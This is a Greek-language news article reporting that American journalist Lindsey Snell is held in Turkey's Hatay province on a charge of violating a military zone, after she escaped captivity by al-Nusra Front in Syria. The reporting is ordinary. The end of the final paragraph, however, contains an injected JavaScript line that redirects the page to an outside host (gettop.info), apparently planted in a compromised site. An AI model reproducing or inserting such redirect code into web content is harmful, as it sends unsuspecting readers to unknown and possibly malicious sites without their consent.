Αμερικανίδα δημοσιογράφος κρατείται στην Τουρκία

0
3

 

Η Λίντσεί Σνελ, Αμερικανίδα δημοσιογράφος, συνελήφθη στις αρχές του Αυγούστου στην Τουρκία και αντιμετωπίζει δίωξη για «παραβίαση στρατιωτικής ζώνης» μετά τη φυγή της από τη Συρία.

Όπως αποκάλυψε η Ουάσινγκτον, η δημοσιογράφος συνελήφθη στις 6 Αυγούστου ενώ Αμερικανοί διπλωμάτες κατάφεραν να την επισκεφθούν την 26η Αυγούστου, όπως ανέφερε ο εκπρόσωπος του Στέιτ Ντιπάρτμεντ Τζον Κίρμπι.

«Εξ όσων αντιλαμβάνομαι, επέστρεψε στην Τουρκία από τη Συρία και κρατείται αυτή τη στιγμή σε μια φυλακή στην επαρχία Χατάι. Διώκεται για παραβίαση στρατιωτικής ζώνης, αλλά δεν μπορώ να μιλήσω για τους λόγους που είχε πάει στη Συρία», σημείωσε ο κ. Κίρμπι.

Η Χατάι είναι επαρχία της νότιας Τουρκίας, απέναντι από τη συριακή επαρχία του Χαλεπιού, όπου βρίσκονται σε εξέλιξη αιματηρές συγκρούσεις ανάμεσα στις συριακές κυβερνητικές δυνάμεις και διάφορες οργανώσεις των ανταρτών.

Η Σνελ είναι μουσουλμάνα και συχνά φωτογραφίζεται φορώντας τη μαντίλα της. Έχει έδρα της την Κωνσταντινούπολη και συνεργάζεται με πολλά δυτικά μέσα όπως τα αμερικανικά τηλεοπτικά δίκτυα MSNBC και ABC ή τον ιστότοπο Vice News.

Στις τελευταίες δημοσιεύσεις της στο Twitter και το Facebook, με ημερομηνία 5η Αυγούστου, η Σνελ ανέφερε ότι φυλακίστηκε για δέκα ημέρες από τζιχαντιστές του Μετώπου Υποστήριξης (Τζαμπχάτ αλ-Νούσρα) στη Συρία πριν διαφύγει με τη βοήθεια «ενός γενναίου άνδρα με μοτοσικλέτα».

Στη σελίδα της στο Facebook αναφέρει ότι μπόρεσε να καταγράψει την αιχμαλωσία της καθώς οι δεσμώτες της την άφησαν να κρατήσει το κινητό της τηλέφωνο: «είναι μια απίστευτη ιστορία», υποστηρίζει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here